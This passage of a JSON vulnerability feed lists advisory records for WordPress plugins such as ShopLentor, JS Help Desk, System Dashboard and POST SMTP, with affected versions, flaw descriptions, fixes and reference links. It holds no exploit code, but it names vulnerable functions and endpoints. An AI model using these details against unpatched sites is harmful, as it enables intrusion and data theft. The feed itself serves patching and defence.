version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6a73a7f-53ac-4930-a1cd-c39818f64678?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6a73a7f-53ac-4930-a1cd-c39818f64678?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolentor-addons\\\/tags\\\/2.8.3\\\/includes\\\/modules\\\/ajax-search\\\/base.php#L137\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolentor-addons\\\/tags\\\/2.8.3\\\/includes\\\/modules\\\/ajax-search\\\/base.php#L137\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088881\\\/woolentor-addons\\\/trunk\\\/includes\\\/modules\\\/ajax-search\\\/base.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088881\\\/woolentor-addons\\\/trunk\\\/includes\\\/modules\\\/ajax-search\\\/base.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13607","slug":"js-support-ticket","versionImpact":"2.8.8","versionEndExcluding":"2.8.9","description":"The JS Help Desk \u2013 The Ultimate Help Desk & Support Plugin plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.8.8 via the 'exportusereraserequest' due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level permissions and above, to export ticket data for any user.","recommendation":"Update to version 2.8.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/js-support-ticket\\\/tags\\\/2.8.8\\\/modules\\\/gdpr\\\/controller.php#L110\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/js-support-ticket\\\/tags\\\/2.8.8\\\/modules\\\/gdpr\\\/controller.php#L110\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230977\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230977\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f57fbbc-ed5a-4452-bd8a-6fc0a4536d76?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f57fbbc-ed5a-4452-bd8a-6fc0a4536d76?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3861","slug":"prevent-direct-access","versionImpact":"2.8.8.2","versionEndExcluding":"2.8.8.3","description":"The Prevent Direct Access \u2013 Protect WordPress Files plugin for WordPress is vulnerable to unauthorized access and modification of data| due to a misconfigured capability check on the 'pda_lite_custom_permission_check' function in versions 2.8.6 to 2.8.8.2. This makes it possible for authenticated attackers, with Contributor-level access and above, to access and change the protection status of media.","recommendation":"Update to version 2.8.8.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/prevent-direct-access\\\/tags\\\/2.8.8.2\\\/includes\\\/pda_lite_api.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/prevent-direct-access\\\/tags\\\/2.8.8.2\\\/includes\\\/pda_lite_api.php#L71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3279923\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3279923\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ed83916-3cf7-4fc6-a16f-45b40cedc721?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ed83916-3cf7-4fc6-a16f-45b40cedc721?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3923","slug":"prevent-direct-access","versionImpact":"2.8.8","versionEndExcluding":"2.8.8.1","description":"The Prevent Direct Access \u2013 Protect WordPress Files plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.8.8 via the 'generate_unique_string' due to insufficient randomness of the generated file name. This makes it possible for unauthenticated attackers to extract sensitive data including files protected by the plugin if the attacker can determine the file name.","recommendation":"Update to version 2.8.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/prevent-direct-access\\\/tags\\\/2.8.8\\\/includes\\\/helper.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/prevent-direct-access\\\/tags\\\/2.8.8\\\/includes\\\/helper.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/prevent-direct-access\\\/trunk\\\/includes\\\/helper.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/prevent-direct-access\\\/trunk\\\/includes\\\/helper.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f648a9ca-a72f-418e-bf1b-ad4ecc27d365?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f648a9ca-a72f-418e-bf1b-ad4ecc27d365?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6327","slug":"woolentor-addons","versionImpact":"2.8.7","versionEndExcluding":"2.8.8","description":"The ShopLentor (formerly WooLentor) plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the purchased_new_products function in all versions up to, and including, 2.8.7. This makes it possible for unauthenticated attackers to view all products purchased in the past week, along with the users that purchased them.","recommendation":"Update to version 2.8.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3080097\\\/woolentor-addons\\\/trunk\\\/includes\\\/modules\\\/sales-notification\\\/class.sale_notification.php?contextall=1&old=3061864&old_path=%2Fwoolentor-addons%2Ftrunk%2Fincludes%2Fmodules%2Fsales-notification%2Fclass.sale_notification.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3080097\\\/woolentor-addons\\\/trunk\\\/includes\\\/modules\\\/sales-notification\\\/class.sale_notification.php?contextall=1&old=3061864&old_path=%2Fwoolentor-addons%2Ftrunk%2Fincludes%2Fmodules%2Fsales-notification%2Fclass.sale_notification.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolentor-addons\\\/tags\\\/2.7.4\\\/includes\\\/modules\\\/sales-notification\\\/class.sale_notification.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolentor-addons\\\/tags\\\/2.7.4\\\/includes\\\/modules\\\/sales-notification\\\/class.sale_notification.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/263324cb-31b7-40ad-ad7d-4582e128cd75?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/263324cb-31b7-40ad-ad7d-4582e128cd75?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5714","slug":"system-dashboard","versionImpact":"2.8.7","versionEndExcluding":"2.8.8","description":"The System Dashboard plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the sd_db_specs() function hooked via an AJAX action in all versions up to, and including, 2.8.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve data key specs.","recommendation":"Update to version 2.8.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53b3ac83-847d-4bd0-a79b-531af266e1b4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53b3ac83-847d-4bd0-a79b-531af266e1b4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.7\\\/admin\\\/class-system-dashboard-admin.php#L2942\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.7\\\/admin\\\/class-system-dashboard-admin.php#L2942\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.8\\\/admin\\\/class-system-dashboard-admin.php#L2949\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.8\\\/admin\\\/class-system-dashboard-admin.php#L2949\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3991","slug":"woolentor-addons","versionImpact":"2.8.7","versionEndExcluding":"2.8.8","description":"The ShopLentor \u2013 WooCommerce Builder for Elementor & Gutenberg +12 Modules \u2013 All in One Solution (formerly WooLentor) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the _id attribute in the Horizontal Product Filter in all versions up to, and including, 2.8.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/563d44cd-5f5a-4914-8312-c554085b0821?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/563d44cd-5f5a-4914-8312-c554085b0821?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3080097\\\/woolentor-addons\\\/trunk\\\/includes\\\/addons\\\/wl_product_horizontal_filter.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3080097\\\/woolentor-addons\\\/trunk\\\/includes\\\/addons\\\/wl_product_horizontal_filter.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5713","slug":"system-dashboard","versionImpact":"2.8.7","versionEndExcluding":"2.8.8","description":"The System Dashboard plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the sd_option_value() function hooked via an AJAX action in all versions up to, and including, 2.8.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve potentially sensitive option values, and deserialize the content of those values.","recommendation":"Update to version 2.8.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9d1a33b-2518-48f7-90b6-a94a34473d1e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9d1a33b-2518-48f7-90b6-a94a34473d1e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.7\\\/admin\\\/class-system-dashboard-admin.php#L6341\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.7\\\/admin\\\/class-system-dashboard-admin.php#L6341\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.8\\\/admin\\\/class-system-dashboard-admin.php#L6357\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.8\\\/admin\\\/class-system-dashboard-admin.php#L6357\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5712","slug":"system-dashboard","versionImpact":"2.8.7","versionEndExcluding":"2.8.8","description":"The System Dashboard plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the sd_global_value() function hooked via an AJAX action in all versions up to, and including, 2.8.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve sensitive global value information.","recommendation":"Update to version 2.8.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70f14d9d-6ed6-4bcb-944d-f9c5aa6a17a6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70f14d9d-6ed6-4bcb-944d-f9c5aa6a17a6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.7\\\/admin\\\/class-system-dashboard-admin.php#L7382\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.7\\\/admin\\\/class-system-dashboard-admin.php#L7382\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.8\\\/admin\\\/class-system-dashboard-admin.php#L7403\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.8\\\/admin\\\/class-system-dashboard-admin.php#L7403\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5711","slug":"system-dashboard","versionImpact":"2.8.7","versionEndExcluding":"2.8.8","description":"The System Dashboard plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the sd_php_info() function hooked via an AJAX action in all versions up to, and including, 2.8.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve sensitive information provided by PHP info.","recommendation":"Update to version 2.8.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17bc3a9f-2bf9-44e3-81ef-bfa932085da9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17bc3a9f-2bf9-44e3-81ef-bfa932085da9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.7\\\/admin\\\/class-system-dashboard-admin.php#L1925\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.7\\\/admin\\\/class-system-dashboard-admin.php#L1925\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.8\\\/admin\\\/class-system-dashboard-admin.php#L1932\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.8\\\/admin\\\/class-system-dashboard-admin.php#L1932\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5710","slug":"system-dashboard","versionImpact":"2.8.7","versionEndExcluding":"2.8.8","description":"The System Dashboard plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the sd_constants() function hooked via an AJAX action in all versions up to, and including, 2.8.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve sensitive information such as database credentials.","recommendation":"Update to version 2.8.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f170379e-e833-42e0-96fd-1e1722a8331c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f170379e-e833-42e0-96fd-1e1722a8331c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.7\\\/admin\\\/class-system-dashboard-admin.php#L7930\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.7\\\/admin\\\/class-system-dashboard-admin.php#L7930\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.8\\\/admin\\\/class-system-dashboard-admin.php#L7951\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.8\\\/admin\\\/class-system-dashboard-admin.php#L7951\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4281","slug":"aryo-activity-log","versionEndExcluding":"2.8.8","description":"This Activity Log WordPress plugin before 2.8.8 retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate its value. This may be used to hide the source of malicious traffic.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f5ea6c8a-6b07-4263-a1be-dd033f078d49\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f5ea6c8a-6b07-4263-a1be-dd033f078d49\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6875","slug":"post-smtp","versionImpact":"2.8.7","versionEndExcluding":"2.8.8","description":"The POST SMTP Mailer \u2013 Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7. This makes it possible for unauthenticated attackers to reset the API key used to authenticate to the mailer and view logs, including password reset emails, allowing site takeover.","recommendation":"Update to version 2.8.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e675d64c-cbb8-4f24-9b6f-2597a97b49af?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e675d64c-cbb8-4f24-9b6f-2597a97b49af?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-smtp\\\/trunk\\\/Postman\\\/Mobile\\\/includes\\\/rest-api\\\/v1\\\/rest-api.php#L60\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-smtp\\\/trunk\\\/Postman\\\/Mobile\\\/includes\\\/rest-api\\\/v1\\\/rest-api.php#L60\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3016051\\\/post-smtp\\\/trunk?contextall=1&old=3012318&old_path=%2Fpost-smtp%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3016051\\\/post-smtp\\\/trunk?contextall=1&old=3012318&old_path=%2Fpost-smtp%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6620","slug":"post-smtp","versionImpact":"2.8.6","versionEndExcluding":"2.8.7","description":"The POST SMTP Mailer WordPress plugin before 2.8.7 does not properly sanitise and escape several parameters before using them in SQL statements, leading to a SQL injection exploitable by high privilege users such as admin.","recommendation":"Update to version 2.8.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ab5c42ca-ee7d-4344-bd88-0d727ed3d9c4\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ab5c42ca-ee7d-4344-bd88-0d727ed3d9c4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7094","slug":"js-support-ticket","versionImpact":"2.8.6","versionEndExcluding":"2.8.7","description":"The JS Help Desk \u2013 The Ultimate Help Desk & Support Plugin plugin for WordPress is vulnerable to PHP Code Injection leading to Remote Code Execution in all versions up to, and including, 2.8.6 via the 'storeTheme' function. This is due to a lack of sanitization on user-supplied values, which replace values in the style.php file, along with missing capability checks. This makes it possible for unauthenticated attackers to execute code on the server. This issue was partially patched in 2.8.6 when the code injection issue was resolved, and fully patched in 2.8.7 when the missing authorization and cross-site request forgery protection was added.","recommendation":"Update to version 2.8.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31513f9e-6185-425b-9e7e-36f21f72d0a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31513f9e-6185-425b-9e7e-36f21f72d0a2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/js-support-ticket\\\/tags\\\/2.8.5\\\/includes\\\/formhandler.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/js-support-ticket\\\/tags\\\/2.8.5\\\/includes\\\/formhandler.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/js-support-ticket\\\/tags\\\/2.8.5\\\/modules\\\/themes\\\/tpls\\\/admin_themes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/js-support-ticket\\\/tags\\\/2.8.5\\\/modules\\\/themes\\\/tpls\\\/admin_themes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/js-support-ticket\\\/tags\\\/2.8.5\\\/modules\\\/themes\\\/controller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/js-support-ticket\\\/tags\\\/2.8.5\\\/modules\\\/themes\\\/controller.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/js-support-ticket\\\/tags\\\/2.8.5\\\/modules\\\/themes\\\/model.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/js-support-ticket\\\/tags\\\/2.8.5\\\/modules\\\/themes\\\/model.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/js-support-ticket\\\/tags\\\/2.8.5\\\/includes\\\/css\\\/style.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/js-support-ticket\\\/tags\\\/2.8.5\\\/includes\\\/css\\\/style.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-51501","slug":"uncode-core","versionEndExcluding":"2.8.7","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Undsgn Uncode - Creative & WooCommerce WordPress Theme allows Reflected XSS.This issue affects Uncode - Creative & WooCommerce WordPress Theme: from n\/a through 2.8.6.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/uncode-core\\\/wordpress-uncode-core-plugin-2-8-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/uncode-core\\\/wordpress-uncode-core-plugin-2-8-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8520","slug":"ultimate-member","versionImpact":"2.8.6","versionEndExcluding":"2.8.7","description":"The Ultimate Member \u2013 User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.8.6. This is due to missing or incorrect nonce validation on the admin_init or user_action_hook function. This makes it possible for unauthenticated attackers to modify a users membership status via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.8.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ffddc03-d4ae-460e-972a-98804d947d09?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ffddc03-d4ae-460e-972a-98804d947d09?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/7b8a7a7c039bde4539c07e049b19036192f1c133\\\/includes\\\/admin\\\/class-admin.php#L1948C1-L1959C6\",\"name\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/7b8a7a7c039bde4539c07e049b19036192f1c133\\\/includes\\\/admin\\\/class-admin.php#L1948C1-L1959C6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/7b8a7a7c039bde4539c07e049b19036192f1c133\\\/includes\\\/admin\\\/class-admin.php#L70C4-L70C84\",\"name\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/7b8a7a7c039bde4539c07e049b19036192f1c133\\\/includes\\\/admin\\\/class-admin.php#L70C4-L70C84\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/7b8a7a7c039bde4539c07e049b19036192f1c133\\\/includes\\\/admin\\\/class-admin.php#L1880\",\"name\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/7b8a7a7c039bde4539c07e049b19036192f1c133\\\/includes\\\/admin\\\/class-admin.php#L1880\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/7b8a7a7c039bde4539c07e049b19036192f1c133\\\/includes\\\/admin\\\/core\\\/class-admin-users.php#L41C4-L41C90\",\"name\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/7b8a7a7c039bde4539c07e049b19036192f1c133\\\/includes\\\/admin\\\/core\\\/class-admin-users.php#L41C4-L41C90\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/7b8a7a7c039bde4539c07e049b19036192f1c133\\\/includes\\\/admin\\\/core\\\/class-admin-users.php#L146C1-L173C12\",\"name\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/7b8a7a7c039bde4539c07e049b19036192f1c133\\\/includes\\\/admin\\\/core\\\/class-admin-users.php#L146C1-L173C12\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/7b8a7a7c039bde4539c07e049b19036192f1c133\\\/includes\\\/admin\\\/class-admin.php#L1945\",\"name\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/7b8a7a7c039bde4539c07e049b19036192f1c133\\\/includes\\\/admin\\\/class-admin.php#L1945\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/7b8a7a7c039bde4539c07e049b19036192f1c133\\\/includes\\\/admin\\\/core\\\/class-admin-users.php#L175C1-L178C7\",\"name\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/7b8a7a7c039bde4539c07e049b19036192f1c133\\\/includes\\\/admin\\\/core\\\/class-admin-users.php#L175C1-L178C7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/pull\\\/1549\",\"name\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/pull\\\/1549\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160947\\\/ultimate-member\\\/trunk\\\/includes\\\/admin\\\/class-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160947\\\/ultimate-member\\\/trunk\\\/includes\\\/admin\\\/class-admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10486","slug":"google-listings-and-ads","versionImpact":"2.8.6","versionEndExcluding":"2.8.7","description":"The Google for WooCommerce plugin for WordPress is vulnerable to Information Disclosure in all versions up to, and including, 2.8.6. This is due to publicly accessible print_php_information.php file. This makes it possible for unauthenticated attackers to retrieve information about Webserver and PHP configuration, which can be used to aid other attacks.","recommendation":"Update to version 2.8.7, or a newer patched 